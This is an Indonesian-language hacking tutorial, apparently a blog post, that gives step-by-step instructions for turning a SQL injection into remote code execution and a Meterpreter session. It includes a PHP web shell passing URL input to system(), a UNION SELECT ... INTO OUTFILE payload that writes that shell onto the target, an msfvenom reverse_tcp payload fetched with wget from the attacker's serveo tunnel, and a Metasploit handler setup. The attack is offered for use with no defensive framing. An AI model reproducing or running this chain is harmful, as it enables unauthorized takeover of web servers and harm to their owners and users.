SQL INJECTION AND RCE INTO METERPRETER

hay guys kali ini cakil akan share tutorial
Sql Injection and RCE into Meterpreter
kuy lah langsung aja step by step nya..

1.siap kan script rce nya
<?php
echo "Remote Code Execution <br>";
$command=$_GET['command'];
system($command);
?>

2.siapkan file metasploit nya
command :
msfvenom -p php/meterpreter/reverse_tcp
LHOST=hostmu LPORT=portmu -f raw > /home/user/meterpreter.php
##
buka file yang tadi kita buat lalu ilangkan tag # atau penutup pada <?php, supaya file php nya berfungsi layaknya file php

search target vuln
example :
http://targetvuln.org/news.php?id=2<sqli>

example RCE With Sql injection :
http://targetvuln.org/news.php?id=2
union select 1,2,3,"<?php $command=$_GET['command'];system($command); ?>",4,5,6 INTO OUTFILE "/path/path/path/rce.php"


nah setelah selesai di up rce nya skrng kita forward http web server kita atau bisa up ke website kalian meterpreter nya

forward http web server
with serveo
root@mrcakil:~#service apache2 restart
root@mrcakip:~#mv meterpreter.php /var/www/html
root@mrcakil:~#ssh -R remotePort:localhost:localportApache serveo.net

nah kalo dh selesai kita forward..
skrng kita rce web nya
http://targetvuln.org/rce.php?command=wget http://acakHuruf.serveo.net/meterpreter.php

setelah terpasang meterpreternya
masuka command :
root@mrcakil:~#msfconsole
msf>use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost hostmu
msf exploit(multi/handler) > set lport portmu
msf exploit(multi/handler) > exploit

nah setelah selesai buka file nya
http://targetvuln.org/meterpreter.php

balik lagi ke terminal
and bum...
SQL INJECTION AND RCE INTO METERPRETER  pwned :V
sekian dan terima kasih...